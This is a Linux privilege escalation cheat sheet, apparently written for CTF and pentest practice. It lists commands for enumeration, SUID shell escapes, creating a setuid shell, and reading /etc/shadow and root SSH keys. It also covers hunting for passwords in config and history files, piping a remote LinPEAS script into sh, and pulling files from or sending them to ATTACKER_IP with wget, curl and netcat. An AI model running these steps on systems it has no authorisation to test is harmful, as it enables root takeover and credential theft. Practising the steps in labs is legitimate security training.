Privilege Escalation Checklist
Initial Enumeration
# System information
uname -a
cat /etc/os-release
cat /proc/version
lscpu
# User information
id
whoami
sudo -l
cat /etc/passwd | grep -v nologin | grep -v false
cat /etc/shadow # If readable
cat /etc/group
history
env
# Network information
ifconfig -a || ip a
route || ip route
netstat -antup || ss -tunlp
iptables -L
cat /etc/hosts
cat /etc/resolv.conf
# Running processes
ps aux
ps -ef
pstree
# Installed packages and services
dpkg -l # Debian-based
rpm -qa # Red Hat-based
service --status-all
systemctl list-unit-files
ls -la /etc/init.d/
# Find world-writable directories and files
find / -writable -type d 2>/dev/null
find / -writable -type f 2>/dev/null
find / -writable -type f -not -path "/proc/*" -not -path "/sys/*" 2>/dev/null
# Find world-executable files
find / -perm -o+x -type f 2>/dev/nullSUID/SGID Binaries
# Find SUID files
find / -perm -u=s -type f 2>/dev/null
# Find SGID files
find / -perm -g=s -type f 2>/dev/null
# Both in one command
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2>/dev/nullExploiting Common SUID Binaries
Using base64 with SUID to read protected files
If base64 has the SUID bit set, it can be exploited to read files that require elevated privileges:
# Check if base64 has SUID bit
ls -la /usr/bin/base64
# If it does, use it to read sensitive files
/usr/bin/base64 /etc/shadow | base64 --decode
/usr/bin/base64 /root/.ssh/id_rsa | base64 --decode
/usr/bin/base64 /var/log/auth.log | base64 --decode
# Use it to read flag files or other sensitive data
/usr/bin/base64 /root/root.txt | base64 --decode
/usr/bin/base64 /home/user/flag.txt | base64 --decode
# Read password hashes to crack offline
/usr/bin/base64 /etc/shadow | base64 --decode | grep root
/usr/bin/base64 /etc/shadow | base64 --decode | grep adminOther common SUID exploitation techniques
# If find has SUID bit
find / -name example -exec whoami \;
# If vim/nano has SUID bit
vim -c ':!/bin/sh'
nano -s /bin/sh
nano
^R^X
reset; sh 1>&0 2>&0
# If cp has SUID bit
cp /bin/sh /tmp/sh
chmod +s /tmp/sh
/tmp/sh -pSudo Rights
# List sudo rights
sudo -l
# Check if you can run anything with sudo
sudo -l 2>/dev/null | grep -v "not allowed" | grep -v "no sudo"Capabilities
# List all files with capabilities
getcap -r / 2>/dev/null
# Check specific directories for capabilities
getcap -r /usr/bin/ 2>/dev/null
getcap -r /usr/sbin/ 2>/dev/null
getcap -r /bin/ 2>/dev/null
getcap -r /sbin/ 2>/dev/nullCron Jobs
# View crontabs
cat /etc/crontab
ls -la /etc/cron*
# Look for unusual cron jobs
find /etc/cron* -type f -exec ls -la {} \; 2>/dev/null
find /var/spool/cron -type f -exec ls -la {} \; 2>/dev/nullPATH Manipulation
# Check PATH
echo $PATH
# Find world-writable directories in PATH
for d in `echo $PATH | tr ":" "\n"`; do
find $d -writable -type d 2>/dev/null
done
# Find writable files in PATH
for d in `echo $PATH | tr ":" "\n"`; do
find $d -writable -type f 2>/dev/null
doneNFS Shares
# Check NFS exports
cat /etc/exports
# Check if 'no_root_squash' option is present
cat /etc/exports | grep no_root_squashKernel Exploits
# Kernel version
uname -a
cat /proc/version
# Distribution details
cat /etc/issue
cat /etc/os-releasePasswords and Sensitive Files
# Config files with passwords
grep -r "password" /etc/ 2>/dev/null
find /etc -name "*.conf" -o -name "*.config" -exec grep -l "password" {} \; 2>/dev/null
# Check common files for credentials
cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg
cat ~/.bash_history
cat ~/.mysql_history
cat ~/.ssh/id_rsa
cat ~/.ssh/id_rsa.pubFinding Files
# Find all .txt files (useful for finding flags)
find / -name "*.txt" 2>/dev/null
# Find specific flag files
find / -name "*flag*" 2>/dev/null
find / -name "*.txt" 2>/dev/null | grep -i flag
# Find files with specific content
grep -r "password" /home 2>/dev/null
grep -r "flag" /home 2>/dev/null
# Find recently modified files
find / -type f -mtime -1 2>/dev/nullAutomated Tools (If Available)
# Download and run LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Download and run LinEnum
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh
# Download and run Linux Smart Enumeration
wget https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh
chmod +x lse.sh
./lse.sh -l1
# Download and run Linux Exploit Suggester
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.shStep-by-Step Methodology
Collect system information (OS, kernel, hardware)
Check current user privileges and groups
Look for SUID/SGID binaries
Check sudo privileges (
sudo -l)Check for capabilities
Examine cron jobs
Inspect PATH for opportunities
Look for NFS shares with no_root_squash
Check for sensitive files with passwords
Hunt for world-writable files and directories
Look for unusual services or processes
If possible, run automated enumeration tools
Consider kernel exploits as a last resort
Common Exploits by Binary
SUID Binaries to Look For
base64 # Read sensitive files
cp # Copy malicious binaries
find # Execute commands
bash/dash # Get shell with elevated privileges
nmap # Interactive mode or script execution
vim/nano # Edit files or get shell
less/more # Read files or get shellSudo Commands to Look For
vi/vim
less
more
man
awk
perl
python
ruby
nmap
tcpdump
bash
sh
findFile Transfer Methods
# Python HTTP server
python -m SimpleHTTPServer 8000 # Python 2
python3 -m http.server 8000 # Python 3
# Download with wget
wget http://ATTACKER_IP:8000/filename
# Download with curl
curl http://ATTACKER_IP:8000/filename -o filename
# Netcat file transfer (receiver)
nc -lvp 1234 > filename
# Netcat file transfer (sender)
cat filename | nc RECEIVER_IP 1234Last updated